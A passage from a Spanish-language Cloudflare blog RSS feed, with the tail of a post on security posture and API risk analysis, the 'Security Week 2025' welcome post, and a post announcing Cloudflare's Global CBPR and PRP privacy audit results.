    <p>Los clientes nos han comentado que, con el creciente entusiasmo en torno a la IA generativa, necesitan ayuda para proteger esta nueva tecnología sin obstaculizar la innovación. La capacidad de descubrir servicios basados en LLM permite ajustar los controles de seguridad que son relevantes para esta tecnología en concreto, como inspeccionar las instrucciones, limitar el porcentaje de instrucciones en función del uso de token, etc. En otra publicación del blog de la Security Week explicaremos cómo desarrollamos nuestra solución Firewall for IA y cómo puedes proteger fácilmente tus cargas de trabajo de IA generativa.</p><p>La detección del fraude de cuentas, que abarca múltiples vectores de ataque, es otra área clave en la que estamos centrados en 2025.</p><p>En muchas páginas de inicio de sesión y de registro se suele utilizar una solución <a href="https://www.cloudflare.com/learning/bots/how-captchas-work/"><u>CAPTCHA</u></a> a fin de permitir el paso solo a los usuarios humanos, suponiendo que los bots son los únicos que realizan acciones no deseadas. Dejando de lado el hecho de que hoy en día la IA puede resolver fácilmente la mayoría de los <a href="https://arstechnica.com/ai/2024/09/ai-defeats-traffic-image-captcha-in-another-triumph-of-machine-over-man/"><u>desafíos CAPTCHA visuales</u></a>, un enfoque de este tipo no puede resolver eficazmente la <i>causa raíz</i> de la mayoría de los vectores de fraude de cuentas. Por ejemplo, los usuarios que utilizan correos electrónicos desechables para registrar cuentas de un solo uso se benefician de las promociones del registro.</p><p>Para resolver este problema de registro fraudulento, se podría implementar una regla de seguridad actualmente en desarrollo como la siguiente, con el objetivo de bloquear todos los intentos que utilicen correos electrónicos desechables como identificador de usuario, sea el solicitante automatizado o no. Todos los puntos finales existentes o futuros con la etiqueta <code>cf-log-in</code> y <code>cf-sign-up</code> están protegidos por esta única regla, ya que ambos requieren la identificación del usuario.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7sJzdnjp9UWrp35Hd3SsGB/db0959b457c555a4a1e93e5515a1e61f/6.png" />
          </figure><p>Nuestra solución de detección de amenazas en función del caso de uso, en rápida expansión, se ejecuta por defecto, desde el primer momento en que incorporas tu tráfico a Cloudflare. Los resultados de la detección, disponibles al instante, se pueden consultar mediante el análisis de seguridad, lo que te ayuda a tomar decisiones mejores y más rápido.</p>
    <div>
      <h5>Evaluación de riesgos de puntos finales de API</h5>
      <a href="#evaluacion-de-riesgos-de-puntos-finales-de-api">
        
      </a>
    </div>
    <p>Las API tienen su propio conjunto de riesgos y vulnerabilidades, y hoy Cloudflare ofrece siete nuevos análisis de riesgos a través de la gestión de la postura de seguridad de API. Esta nueva función de API Shield te ayuda a reducir el riesgo al identificar los problemas de seguridad y solucionarlos antes de que se produzcan ataques a las API. Dado que las API suelen estar formadas por muchos servicios de backend distintos, los equipos de seguridad deben identificar qué servicio de backend es vulnerable para que los equipos de desarrollo puedan solucionar los problemas identificados.</p><p>Nuestros nuevos análisis de riesgos de gestión de la postura de seguridad de API hacen exactamente eso: los usuarios pueden identificar rápidamente qué puntos finales de la API están en riesgo ante una serie de vulnerabilidades, como la exposición de datos confidenciales, el estado de autenticación, los ataques de <a href="https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/"><u>error de autorización a nivel de objeto (BOLA)</u></a> y muchas más.</p><p>La postura de autenticación es un análisis de riesgos que verás en el nuevo sistema. Para empezar, nos centramos en ella porque los datos confidenciales están en riesgo cuando se supone que se aplica la autenticación de la API, pero esta en realidad no funciona. La <a href="https://developers.cloudflare.com/api-shield/security/authentication-posture/"><u>postura de autenticación</u></a> ayuda a los clientes a identificar los errores de configuración para las API y alerta de su presencia. Para ello, se analizan las solicitudes correctas enviadas a la API y se anota su estado de autenticación. API Shield analiza el tráfico a diario y etiqueta los puntos finales de API donde falta la autenticación o esta es mixta para revisarlos posteriormente.</p><p>Los clientes que han configurado los ID de sesión en API Shield pueden encontrar las nuevas etiquetas de análisis de riesgos y los detalles de autenticación por punto final en API Shield. Los equipos de seguridad pueden proporcionar esta información a sus equipos de desarrollo para corregir el error de autenticación.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/21jVSrwsgfjKlyxyOZ5Qye/7963d95ea28a41f5e2b4f331ab5d5060/7.png" />
          </figure><p>Hoy lanzamos los <a href="https://developers.cloudflare.com/api-shield/management-and-monitoring/endpoint-labels/"><u>análisis</u></a> de la postura de autenticación, los datos confidenciales, las API desprotegidas, los ataques BOLA y el análisis de anomalías para el rendimiento de las API en cuanto a errores, latencia y tamaño de la respuesta.</p>
    <div>
      <h3>Simplifica el mantenimiento de una buena postura de seguridad con Cloudflare</h3>
      <a href="#simplifica-el-mantenimiento-de-una-buena-postura-de-seguridad-con-cloudflare">
        
      </a>
    </div>
    <p>Para una buena postura de seguridad en un entorno en rápida evolución se requieren soluciones innovadoras que puedan transformar la complejidad en simplicidad. Nuestro primer paso para respaldar los esfuerzos de nuestros clientes para garantizar una postura de seguridad adecuada es combinar la capacidad de evaluación continua de las amenazas y los riesgos en los entornos informáticos públicos y privados a través de una única plataforma.</p><p>Para mejorar aún más la relevancia de la información sobre seguridad y las sugerencias proporcionadas y ayudarte a priorizar mejor tus acciones, estamos estudiando la posibilidad de integrar la visión global de Cloudflare del panorama de amenazas. Esto te ofrece perspectivas adicionales, como cuáles representan las mayores amenazas para tu sector y cuáles son los objetivos de los atacantes en este momento. No te pierdas las novedades que lanzaremos este mismo año.</p><p>Si aún no lo has hecho, <a href="https://dash.cloudflare.com/?to=/:account/security-center"><u>incorpora hoy mismo tus aplicaciones web y SaaS a Cloudflare</u></a> para obtener información instantánea sobre cómo mejorar la postura de seguridad de tu empresa.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Gestión de la postura de seguridad]]></category>
            <category><![CDATA[Seguridad]]></category>
            <category><![CDATA[Centro de seguridad]]></category>
            <category><![CDATA[Seguridad SaaS]]></category>
            <category><![CDATA[Seguridad de aplicaciones]]></category>
            <category><![CDATA[Seguridad de la API]]></category>
            <category><![CDATA[Seguridad del correo electrónico]]></category>
            <guid isPermaLink="false">41Rkgr3IVvWI5n1DpmMDkJ</guid>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Noelle Kagan</dc:creator>
            <dc:creator>John Cosgrove</dc:creator>
            <dc:creator>Frank Meszaros</dc:creator>
            <dc:creator>Yugesha Sapte</dc:creator>
        </item>
        <item>
            <title><![CDATA[Te damos la bienvenida a Security Week 2025]]></title>
            <link>https://blog.cloudflare.com/es-es/welcome-to-security-week-2025/</link>
            <pubDate>Sun, 16 Mar 2025 18:00:00 GMT</pubDate>
            <description><![CDATA[ La próxima semana hablaremos de las últimas tendencias en ciberseguridad y presentaremos los nuevos productos, asociaciones y tecnologías de Cloudflare. ¡Te damos la bienvenida a Security Week 2025! ]]></description>
            <content:encoded><![CDATA[ <p>La capa de seguridad que protege Internet hoy en día es esencial para que todo esté a salvo, desde la forma en que compramos en línea, interactuamos con nuestras comunidades, accedemos a recursos sanitarios esenciales, sustentamos la economía digital mundial y mucho más. Nuestra dependencia de Internet ha dado lugar a ciberataques más grandes y generalizados que nunca. Esto agrava el llamado dilema del defensor: los atacantes solo necesitan tener éxito una vez, mientras que los defensores deben tener éxito siempre.</p><p>Durante el último año, <a href="https://blog.cloudflare.com/ddos-threat-report-for-2024-q4/"><u>descubrimos y mitigamos el mayor ataque DDoS</u></a> jamás registrado en la historia de Internet, en tres ocasiones distintas, lo que subraya los esfuerzos rápidos y persistentes de los ciberdelincuentes. Hemos ayudado a <a href="https://blog.cloudflare.com/elections-2024-internet/"><u>salvaguardar el mayor año de elecciones</u></a> en todo el mundo, en las que más de la mitad de la población mundial tenía derecho de voto, al mismo tiempo que hemos visto cómo las tensiones geopolíticas y la guerra se reflejaban en el entorno digital.</p><p>2025 ya promete seguir el mismo camino, y se estima que este año los ciberataques costarán a la economía mundial 10,5 billones de dólares. Mientras aumenta el rápido avance de la <a href="https://x.com/i/grok?text=AI%20advancements">IA</a> y las tecnologías emergentes, y los ciberdelincuentes muestran cada vez una mayor agilidad y creatividad, el panorama de la seguridad sigue evolucionando drásticamente. Las organizaciones afrontan ahora un mayor volumen de ataques y la llegada de amenazas más complejas que tienen consecuencias en el mundo real, como los ciberataques patrocinados por los estados y los ataques a infraestructuras críticas. </p><p>Mi trabajo es proteger a Cloudflare como organización y ayudar a nuestros clientes a ir un paso por delante de los ciberdelincuentes. Si bien en Cloudflare cada semana es una semana dedicada a la seguridad, ha llegado el momento del lanzamiento: ¡de eso se tratan las Semanas de la innovación! ¡Te damos la bienvenida a Security Week 2025!</p>
    <div>
      <h2>Mi perspectiva sobre el panorama de la seguridad</h2>
      <a href="#mi-perspectiva-sobre-el-panorama-de-la-seguridad">
        
      </a>
    </div>
    <p>Como director de seguridad, tengo el privilegio de colaborar con responsables de seguridad de talla mundial que se enfrentan al dinámico panorama normativo y de las amenazas. Gracias a fructíferos intercambios en foros como el Foro Económico Mundial en Davos, RSA y Black Hat, he conocido perspectivas de gran utilidad sobre las dificultades comunes que nos encontramos al abordar las necesidades de seguridad actuales:</p><ul><li><p><b>Complejidad: </b>la complejidad se ha convertido en el enemigo de la seguridad. Los equipos tienen dificultades relacionadas con las pilas tecnológicas fragmentadas, los entornos multinube y la continua falta de profesionales de la seguridad. El conocimiento de la situación es limitado, los sistemas dispares aumentan la sobrecarga operativa y la capacidad de modernización supone un desafío.</p></li><li><p><b>Inteligencia artificial: </b>la IA no solo ofrece oportunidades, sino también riesgos. Las organizaciones desean beneficiarse de la IA lo antes posible, y la empiezan a utilizar sin tener tiempo de formar a sus equipos de trabajo sobre cómo mitigar los riesgos específicos que plantea. Se pide a los equipos de seguridad que protejan los modelos de IA para proteger los datos confidenciales y respaldar la estabilidad operativa, todo ello con presupuestos y recursos limitados.</p></li><li><p><b>Puntos ciegos de la seguridad: </b>la superficie de ataque sigue ampliándose. Con el trabajo remoto, la migración a la nube y la aceleración de la transformación digital, los equipos de seguridad tienen dificultades para mantener la visibilidad en entornos cada vez más distribuidos. Esta expansión ha creado puntos ciegos que sofisticados ciberdelincuentes pueden aprovechar rápidamente.</p></li><li><p><b>Proveedores de confianza: </b>los incidentes de seguridad en la cadena de suministro aumentan año tras año. Recientes incidentes de gran repercusión han demostrado cómo las vulnerabilidades de los componentes de terceros pueden propagarse en cascada por el ecosistema digital. Los equipos de seguridad deben tener en cuenta los riesgos que van mucho más allá de su perímetro inmediato, extendiéndose a todas las dependencias de su pila tecnológica.</p></li><li><p><b>Velocidad de detección: </b>se sigue tardando demasiado tiempo en detectar una amenaza en el entorno. A pesar de las inversiones en tecnologías de supervisión y detección, el tiempo medio de permanencia de los atacantes sigue superando los objetivos del sector. Los responsables de seguridad expresan su frustración porque sofisticados ciberdelincuentes pueden operar dentro de las redes sin ser detectados durante largos periodos de tiempo.</p></li></ul><p>Lo que está claro en la comunidad de la seguridad es que el enfoque tradicional de añadir soluciones específicas no es sostenible. Los responsables de seguridad necesitan plataformas integradas que reduzcan la complejidad y ofrezcan protección y visibilidad integrales. Precisamente por ese motivo <a href="https://blog.cloudflare.com/why-i-joined-cloudflare-as-chief-security-officer/"><u>me incorporé a Cloudflare hace casi dos años</u></a>: para ayudar a crear soluciones innovadoras para el panorama de amenazas presente y futuro, no para el panorama de amenazas de hace cinco años.</p>
    <div>
      <h2>Prioridades de la Security Week 2025</h2>
      <a href="#prioridades-de-la-security-week-2025">
        
      </a>
    </div>
    <p>Durante la próxima semana, presentaremos innovaciones que ayudarán a los profesionales de la seguridad a resolver los desafíos que afrontan a diario. Como responsable de la organización de seguridad de Cloudflare, y Cliente Zero, nuestro equipo ha influido en el lanzamiento de las actualizaciones de productos que tendrán lugar esta semana.</p><p>Aquí tienes un avance de lo que puedes esperar esta semana:</p>
    <div>
      <h3>Proteger el mundo poscuántico</h3>
      <a href="#proteger-el-mundo-poscuantico">
        
      </a>
    </div>
    <p>La informática cuántica cambiará para siempre la seguridad en Internet, sobre todo en el ámbito de la criptografía, que es la forma de proteger las comunicaciones y la información a través de canales como Internet.</p><p>A medida que la computación cuántica continúa evolucionando, el trabajo de investigación y desarrollo de la criptografía avanza en paralelo. Confiamos en que con los esfuerzos conjuntos entre el NIST, Microsoft, Cloudflare y otras empresas de computación se logrará una solución sólida y basada en estándares. </p><p>Cloudflare anunciará los avances de su solución Zero Trust nativa de nube y <a href="https://blog.cloudflare.com/tag/post-quantum/"><u>segura desde el punto de vista cuántico</u></a>, la primera de este tipo. Esto garantiza una seguridad del tráfico de la red corporativa preparada para el futuro y que nuestros clientes pueden adoptar fácilmente. Las actualizaciones que compartirá nuestro equipo de producto redefinirán cómo las empresas y los particulares afrontarán nuestro panorama poscuántico en evolución.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1VEhsmtQf722vc2NJTVRco/cf5127478d25ca87d38b2bbb501f86db/unnamed.png" />
          </figure>
    <div>
      <h3>Contextualización de las amenazas en la red que bloquea la mayoría de los ataques </h3>
      <a href="#contextualizacion-de-las-amenazas-en-la-red-que-bloquea-la-mayoria-de-los-ataques">
        
      </a>
    </div>
    <p>Los programas de seguridad eficaces deben ir varios pasos por delante de las amenazas emergentes. La información sobre amenazas disponible para la mayoría de los equipos de seguridad no tiene contexto, por lo que es difícil reaccionar en consecuencia. </p><p>Esta semana lanzamos nuestra plataforma de eventos de amenazas, que proporciona a nuestros clientes datos de la información sobre amenazas en tiempo real. Gracias al gran alcance de nuestra red, los clientes tendrán una visión integral de las ciberamenazas basada en los ataques que se producen en Internet. </p><p>Este producto permitirá a los usuarios obtener ellos mismos información contextual sobre los ataques que se producen en Internet, mejorando su capacidad para ajustar proactivamente sus defensas y responder a las amenazas emergentes. Como profesionales de la seguridad, no basta con detener las amenazas en la puerta de acceso, tenemos que anticiparnos al siguiente vector. La fuente de eventos de amenazas proporciona esa capa adicional de análisis forense para darnos esa ventaja, analizando quién, cómo y por qué está detrás de cada ataque. Es como realizar una autopsia a las amenazas que neutralizamos, para descubrir patrones, tácticas y posibles debilidades en nuestras defensas que los datos sin procesar por sí solos podrían pasar por alto.</p>
    <div>
      <h3>Detener las amenazas en el perímetro con IA</h3>
      <a href="#detener-las-amenazas-en-el-perimetro-con-ia">
        
      </a>
    </div>
    <p>No resulta ninguna sorpresa que la IA sea el principal tema de conversación. La IA es un tema común en todos los sectores, y la principal preocupación es la protección y la seguridad de nuestras inversiones. Como empresa líder en el suministro de infraestructura para el entrenamiento y la inferencia de la IA, nuestros equipos de ingeniería y productos han estado trabajando arduamente para desarrollar una forma de proteger nuestros propios modelos, datos y aplicaciones de IA, así como los de nuestros clientes.</p><p>Esta semana, nuestro equipo de producto compartirá cómo nuestros usuarios pueden obtener un mayor control sobre sus datos con nuestro nuevo Firewall for IA y las capacidades mejoradas para nuestro AI Gateway relacionado. El mundo ha pasado de centrarse en la creación de modelos a su implementación activa, y necesitas protegerte contra la explotación de tus datos por parte de terceros para entrenar sus propios sistemas de IA generativa. </p><p>Además, proporcionaremos a los equipos de seguridad visibilidad y protección en todas las aplicaciones web y empresariales desde una única plataforma unificada. Esta nueva función puede identificar la ubicación de todas las aplicaciones en tu organización, comprender las amenazas potenciales correspondientes y proporcionar recomendaciones para la reducción de riesgos.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5jgsJYcCabhPRnJjrdVElQ/27574287408a505782afa32a027731d5/unnamed__1_.png" />
          </figure>
    <div>
      <h3>¿Cómo puedo ayudar a mejorar Internet?</h3>
      <a href="#como-puedo-ayudar-a-mejorar-internet">
        
      </a>
    </div>
    <p>Más allá de las nuevas herramientas y funciones, la Security Week 2025 representa nuestro compromiso con nuestra misión de ayudar a mejorar Internet.</p><p>Lo que distingue a Cloudflare es nuestra posición única en la intersección entre la seguridad y la innovación. Las soluciones que presentamos esta semana no son solo respuestas a las amenazas actuales. Son innovaciones con visión de futuro que se anticipan a los desafíos del mañana. Reflejan nuestra perspectiva de que la seguridad debe evolucionar para pasar de ser reactiva a predictiva, de compleja a intuitiva, y de aislada a integrada.</p>
    <div>
      <h2>Te damos la bienvenida a la Security Week</h2>
      <a href="#te-damos-la-bienvenida-a-la-security-week">
        
      </a>
    </div>
    <p>Las Semanas de la Innovación se han convertido en la piedra angular de nuestra forma de conectar con nuestra comunidad en Cloudflare. Para mí, cada Security Week aporta energía y perspectivas renovadas. Las conversaciones con los clientes, los profesionales de la seguridad y los líderes del sector redefinen continuamente nuestra perspectiva de lo que es posible.</p><p>Te invito a que interactúes con nosotros durante toda esta semana, ya sea mediante las demostraciones en directo, los análisis técnicos o las conversaciones directas con nuestro equipo. Espero que salgas no solo con nuevas herramientas, sino con una visión más clara de cómo podemos crear colectivamente una experiencia de Internet más segura para todos.</p><p>El futuro de la seguridad no consiste en construir muros más altos, sino en crear ecosistemas más inteligentes. Construyamos ese futuro juntos.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6ZgAsuDrtmGZeGvmFaigWT/6c1fe42eee2fac7320b8562d71269abc/unnamed__2_.png" />
          </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Seguridad]]></category>
            <guid isPermaLink="false">60jUb6Vj3kgqQdiJp4P3FX</guid>
            <dc:creator>Grant Bourzikas</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare cumple con las nuevas normas Global CBPR (Cross-Border Privacy Rules)]]></title>
            <link>https://blog.cloudflare.com/es-es/cloudflare-cbpr-a-global-privacy-first/</link>
            <pubDate>Tue, 28 Jan 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare es la primera organización a nivel mundial en anunciar que hemos superado con éxito una auditoría de conformidad con los sistemas Global CBPR y Global PRP. ]]></description>
            <content:encoded><![CDATA[ <p>Cloudflare se enorgullece de liderar el camino con nuestro enfoque de la <a href="https://www.cloudflare.com/learning/privacy/what-is-data-privacy/">privacidad de los datos</a> y la protección de la <a href="https://www.cloudflare.com/learning/privacy/what-is-personal-information/">información personal</a>, y hemos sido fervientes defensores de la necesidad del libre flujo de datos a través de las fronteras jurisdiccionales. Así que hoy, Día de la Privacidad de Datos (también conocido internacionalmente como el Día de la Protección de Datos), nos complace anunciar que añadimos nuestra cuarta y quinta validaciones de privacidad, y esta vez ¡somos los primeros a nivel mundial! Cloudflare es la primera organización en anunciar que hemos superado con éxito una auditoría de conformidad con los nuevos sistemas <a href="https://www.globalcbpr.org/privacy-certifications/"><u>Global CBPR (Cross-Border Privacy Rules) para controladores de datos y Global PRP (Privacy Recognition for Processors)</u></a>. Estas validaciones demuestran nuestro apoyo y cumplimiento de las normas globales que garantizan flujos de datos que respetan la privacidad en todas las jurisdicciones. Las organizaciones que hayan superado con éxito la auditoría recibirán la certificación formal cuando estas certificaciones se publiquen oficialmente, lo que esperamos para este mismo año. </p><p>Nuestra participación en Global CBPR y Global PRP se añade a nuestra lista de validaciones de privacidad: fuimos una de las primeras organizaciones de ciberseguridad en certificar la norma internacional de privacidad <a href="https://blog.cloudflare.com/iso-27701-privacy-certification/"><u>ISO 27701:2019</u></a> cuando se publicó, y en 2022 también obtuvimos la certificación de privacidad en la nube, <a href="https://www.cloudflare.com/trust-hub/compliance-resources/iso-certifications/"><u>ISO 27018:2019.</u></a> En 2023, añadimos nuestra tercera validación de privacidad, revisada por un organismo de supervisión independiente de la Unión Europea (UE) y declarada conforme al primer código de conducta oficial del RGPD: <i>el </i><a href="https://blog.cloudflare.com/cloudflare-official-gdpr-code-of-conduct/"><i><u>Código de conducta en la nube de la UE</u></i></a>.</p>
    <div>
      <h3>Por qué es importante para los clientes de Cloudflare</h3>
      <a href="#por-que-es-importante-para-los-clientes-de-cloudflare">
        
      </a>
    </div>
    <p>En conjunto, Cloudflare demuestra nuestro cumplimiento de las principales validaciones oficiales en materia de privacidad en 39 jurisdicciones de todo el mundo, desde Australia y Austria hasta Suecia y Estados Unidos. Otras cuatro jurisdicciones (Reino Unido, Bermudas, Mauricio y el Centro Financiero Internacional de Dubái) también están en proceso de unirse y reconocer las certificaciones Global CBPR. Esto es importante para los clientes de Cloudflare, ya que garantiza que las prácticas de privacidad que hemos desarrollado cuentan con el reconocimiento de gobiernos de todo el mundo.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2RFlkr3Wht9Gu34lv2xxN9/8f3c8e5dc23963614d275dab085cd8ce/unnamed.png" />
          </figure>
    <div>
      <h3>¿Qué es el sistema Global CBPR?</h3>
      <a href="#que-es-el-sistema-global-cbpr">
        
      </a>
    </div>
    <p>En los últimos tres años, gobiernos de todo el mundo han estado preparando dos nuevas normas internacionales de privacidad. El 30 de abril de 2024 se logró un hito importante cuando <a href="https://www.globalcbpr.org/global-cbpr-forum-announces-the-establishment-of-the-global-cbpr-and-global-prp-systems-and-welcomes-new-global-cape-participants/"><u>se instauró el sistema Global CBPR</u></a>. El sistema CBPR es un sistema voluntario, aplicable, internacional y basado en la responsabilidad que facilita los flujos de datos que respetan la privacidad entre las economías de los miembros. Proporciona un nivel básico de protección de la privacidad de los consumidores gracias a un conjunto de reglas que rigen la gestión de la información personal de las personas. Esto facilita el libre flujo de datos, ya que garantiza la privacidad de los consumidores entre los miembros participantes, a pesar de que cada jurisdicción tenga sus propias leyes individuales de protección de datos.</p><p>El sistema CBPR fue desarrollado por <a href="https://www.globalcbpr.org/about/membership/"><u>Global CBPR Forum</u></a>, un foro intergubernamental integrado por los gobiernos de Australia, Canadá, Japón, República de Corea, México, Filipinas, Singapur, China Taipéi y Estados Unidos. El Reino Unido también es miembro asociado de CBPR Forum, al igual que Bermudas, Mauricio y el Centro Financiero Internacional de Dubái, lo que indica su intención de unirse como miembros de pleno derecho en el futuro.</p><p>Durante el último año, hemos estado ocupados con la preparación del lanzamiento del sistema Global CBPR. El 1 de mayo de 2024, el primer día tras la instauración del sistema, Cloudflare solicitó unirse. Ya hemos alcanzado el importante hito de superar con éxito las auditorías de conformidad con los requisitos, lo que significa que esperamos ser la primera organización del mundo en obtener la nueva certificación del sistema Global CBPR, así como del sistema Global PRP relacionado, cuando las empresas puedan certificarse oficialmente, lo que se espera para este mismo año.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5F7HXXU071UJtx68KHGn41/0228087d6420c26802d77c13fafe935c/image1.png" />
          </figure>
    <div>
      <h3>Qué incluye el sistema Global CBPR</h3>
      <a href="#que-incluye-el-sistema-global-cbpr">
        
      </a>
    </div>
    <p>El sistema Global CBPR contiene una lista detallada de cincuenta requisitos que las organizaciones deben cumplir si desean obtener la certificación de este sistema. Los requisitos se derivan de los nueve <b>Principios de privacidad de Global CBPR</b>, coherentes con los principios básicos de las Directrices sobre la protección de la privacidad y los flujos transfronterizos de datos personales de la <a href="https://www.oecd.org/en/publications/2002/02/oecd-guidelines-on-the-protection-of-privacy-and-transborder-flows-of-personal-data_g1gh255f.html"><u>Organización para la Cooperación y el Desarrollo Económico (OECD)</u></a>. Los cincuenta requisitos abarcan cómo las organizaciones deben recopilar, gestionar y proteger la información personal bajo su custodia. Para obtener la certificación Global CBPR, las organizaciones deben cumplir cada uno de los cincuenta requisitos. Estos son los nueve principios subyacentes de los requisitos:</p><table><tr><td><p>Prevención de daños</p></td><td><p>Aviso</p></td><td><p>Limitación de la recopilación de datos</p></td></tr><tr><td><p>Usos de la información personal</p></td><td><p>Elección</p></td><td><p>Integridad de la información personal</p></td></tr><tr><td><p>Garantías de seguridad</p></td><td><p>Acceso y corrección</p></td><td><p>Responsabilidad</p></td></tr></table><p><i><sup>Los nueve principios de privacidad de Global CBPR</sup></i></p><p>La certificación Global CBPR cubre la gestión de la información personal controlada por la organización, como los datos personales de los clientes, empleados y solicitantes de empleo. En el caso de Cloudflare, esto también incluye la información de la red, es decir, nuestras observaciones sobre cómo nuestra plataforma global en la nube gestiona los datos de los servidores, la red o el tráfico generados por Cloudflare en el transcurso de la prestación de nuestros servicios.</p><p>La certificación Global PRP (Privacy Recognition for Processors) aborda la gestión de la información personal que procesa la organización en nombre de otra organización, normalmente su cliente. Los dieciocho requisitos de PRP están relacionados con los dos principios de privacidad más relevantes cuando se procesa esta información en nombre de otra organización: las <i>garantías de seguridad y responsabilidad</i>. Para Cloudflare, esto cubre el tratamiento de datos de conformidad con el <a href="https://www.cloudflare.com/cloudflare-customer-dpa/"><u>Acuerdo de tratamiento de datos (DPA)</u></a> que firmamos con todos nuestros clientes, principalmente, el Contenido del cliente que fluye a través de nuestra red y los Registros del cliente generados por esos flujos de datos. Para obtener la certificación Global PRP, las organizaciones deben cumplir cada uno de los dieciocho requisitos.</p>
    <div>
      <h3>Más información sobre algunos de los requisitos del sistema Global CBPR</h3>
      <a href="#mas-informacion-sobre-algunos-de-los-requisitos-del-sistema-global-cbpr">
        
      </a>
    </div>
    <p>Como se ha señalado, los principales requisitos de los sistemas Global CBPR y Global PRP abarcan los conocidos principios de protección de datos de aviso, elección, limitación de la recopilación (minimización de datos), el derecho de acceso y corrección del interesado, la seguridad adecuada, la prevención de daños, la integridad de la información personal, la responsabilidad y los usos de la información personal. Docenas de requisitos incluyen estos principios, así que aquí solo mencionaremos algunos de ellos.</p><p>Veamos primero el principio de aviso. Uno de los requisitos más obvios de CBPR es la pregunta 1:</p><p><i>¿Proporcionas declaraciones claras y fácilmente accesibles sobre tus prácticas y políticas que rigen la información personal descrita anteriormente (una declaración de privacidad)?</i></p><p>La transparencia en la recopilación y el uso de la información personal es un principio clave de la privacidad y la protección de datos, y la transparencia es uno de los compromisos fundamentales de Cloudflare. La documentación de nuestras prácticas y políticas con respecto a cómo utilizamos la información personal permite a los usuarios decidir si desean proporcionar su información, y por eso es una práctica recomendable que el aviso de privacidad esté disponible y visible en el momento de recopilación de la información. De hecho, este concepto de proporcionar un aviso a los usuarios se desprende claramente del <a href="https://eur-lex.europa.eu/eli/reg/2016/679/oj/eng#art_13"><u>artículo 13 del RGPD de la UE</u></a>. Cloudflare cumple con este requisito de CBPR proporcionando un aviso de privacidad claro y accesible, visible en el pie de todas las páginas de nuestro sitio web. También facilitamos un enlace al aviso cuando recopilamos datos personales, por ejemplo, a través de un formulario en una página web.</p><p>En cuanto a cómo utilizamos la información personal, la pregunta 8 plantea:</p><p><i>¿Limitas el uso de la información personal que recopilas (ya sea directamente o mediante el uso de terceros que actúen en tu nombre) tal como se identifica en tu declaración de privacidad?</i></p><p>Hace mucho tiempo que Cloudflare asumió el compromiso de utilizar la información personal que recopilamos únicamente para los fines de nuestros servicios. Nuestro negocio se basa en proporcionar a los clientes las herramientas necesarias para proteger sus aplicaciones de red y mejorar su velocidad, fiabilidad y privacidad. En nuestra <a href="https://www.cloudflare.com/privacypolicy/"><u>Política de privacidad</u></a>, nos comprometemos a que "solo compartiremos o divulgaremos tu información personal según sea necesario para prestar nuestros Servicios o según se describa de otro modo en esta Política, excepto en los casos en los que primero te lo notifiquemos y tengas la oportunidad de dar tu consentimiento". Además, mantenemos documentación interna (de conformidad con el principio de responsabilidad de CBPR) para documentar los datos que procesamos y los fines con los que los procesamos.</p><p>Otros requisitos importantes de los sistemas Global CBPR y Global PRP están relacionados con las garantías de seguridad. La pregunta 27 del requisito CBPR plantea:</p><p><i>¿Puedes describir las medidas de protección físicas, técnicas y administrativas que has implementado para proteger la información personal contra riesgos tales como la pérdida o el acceso no autorizado, la destrucción, el uso, la modificación o la divulgación de información u otros usos indebidos?</i></p><p>En Global PRP, un requisito similar es la pregunta 2: </p><p><i>¿Puedes describir las medidas de protección físicas, técnicas y administrativas que implementan la política de seguridad de la información de tu organización?</i></p><p>Cloudflare ha implementado un programa de seguridad de la información de acuerdo con la familia de normas ISO/IEC 27000. Los detalles del programa de seguridad de Cloudflare están documentados en el Anexo 2 ("Medidas de seguridad técnicas y organizativas") del <a href="https://www.cloudflare.com/cloudflare-customer-dpa/"><u>Acuerdo de tratamiento de datos de clientes</u></a> de Cloudflare, incluidas las medidas de protección físicas, técnicas y administrativas implementadas con el fin de proteger la información personal.</p><p>En relación con el principio de responsabilidad, la pregunta 46 plantea:</p><p><i>¿Dispones de mecanismos para garantizar que se cumplan tus obligaciones con los usuarios aplicables a procesadores de información personal, agentes, contratistas u otros proveedores de servicios relacionados con la información personal que procesen en tu nombre? </i></p><p>Cuando tenemos proveedores que gestionan información personal nuestra o de nuestros clientes, les exigimos que firmen un Acuerdo de tratamiento de datos (DPA) con nosotros. Esto garantiza que los compromisos que asumimos para con nuestros clientes en nuestros acuerdos de cliente se transmitan a su vez a nuestros proveedores, incluidos los requisitos de seguridad, haciéndoles, y haciéndonos, responsables.</p>
    <div>
      <h3>Más información</h3>
      <a href="#mas-informacion">
        
      </a>
    </div>
    <p>Estamos entusiasmados con el lanzamiento de las certificaciones Global CBPR, que se espera para este mismo año, y estamos orgullosos de que hoy, Día de la Privacidad de Datos, podamos demostrar una vez más nuestro compromiso con los principios universales para la protección de la privacidad de los datos personales.</p><p>Consulta <a href="https://www.globalcbpr.org/"><u>globalcbpr.org</u></a> si deseas más información sobre los sistemas Global CBPR y Global PRP, descargar una copia completa de los requisitos y estar al día de las noticias relacionadas.</p><p>Para obtener información actualizada sobre nuestras certificaciones, visita nuestro <a href="https://www.cloudflare.com/trust-hub/compliance-resources/"><u>Centro de confianza</u></a>. Los clientes también pueden descubrir cómo descargar una copia de las certificaciones y los informes de Cloudflare desde el <a href="https://developers.cloudflare.com/fundamentals/get-started/basic-tasks/access-compliance-docs/"><u>panel de control de Cloudflare</u></a>.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/36LV7CkbF5b5IuXN4ZVXZC/77775c3e2791418d87c36d46e755fbbc/image2.png" />
          </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Certificación]]></category>
            <category><![CDATA[Privacidad]]></category>
